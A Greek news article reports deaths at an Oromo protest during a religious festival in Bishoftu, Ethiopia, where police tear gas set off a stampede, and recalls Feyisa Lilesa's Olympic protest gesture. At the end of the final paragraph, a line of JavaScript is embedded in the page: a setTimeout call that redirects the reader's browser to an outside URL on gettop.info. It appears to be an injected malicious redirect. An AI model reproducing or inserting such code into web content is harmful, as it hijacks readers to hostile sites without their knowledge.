Εκατόμβη νεκρών σε διαδήλωση στην Αιθιοπία

0
20

 

Περισσότεροι από εκατό άτομα φέρεται να σκοτώθηκαν σύμφωνα με εκτιμήσεις της αντιπολίτευσης σε αντικυβερνητική διαδήλωση στην πόλη Μπισόφτου στην περιοχή Ορομίγια της εθνότητας των Ορόμο.

Όπως μεταδίδουν τα Μέσα η εθνοτική ομάδα των Ορόμο, που αποτελούν το 1/3 του πληθυσμού, συμμετείχαν σε θρησκευτικό φεστιβάλ για την ολοκλήρωση της περιόδου των βροχοπτώσεων. Οι Ορόμο διαμαρτύρονταν για την περιθωριοποίησή τους και την καταπάτηση των εκτάσεών τους από εργοστασιακές εγκαταστάσεις.

Η αστυνομία προσπάθησε να διαλύσει το πλήθος με τη χρήση δακρυγόνων προκαλώντας πανικό με αποτέλεσμα οι πιστοί να ποδοπατηθούν και πλέον να γίνεται λόγος για αιματοκυλισμα καθώς οι νεκροί εκτιμάται ότι είναι από 50 έως και περισσότεροι από 200. Η αντιπολίτευση έκανε λόγο για τουλάχιστον 100 νερούς ενώ ακόμη αναμένεται επίσημος απολογισμός.

Υπενθυμίζεται ότι ο Ολυμπιονίκης του Ρίο Φεγίσα Λιλέσα στη γραμμή τερματισμού σταύρωσε τα χέρια του στέλνοντας μήνυμα στον λαό του που διώκεται από την επίσημη κυβέρνηση.

Όπως ειπώθηκε στην πόλη είχαν προσέλθει περίπου 2 εκατ. άτομα για το φεστιβάλ ενώ τη στιγμή της αστυνομικής επιχείρησης στο σημείο φέρεται να βρίσκονταν 10.000 άτομα. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here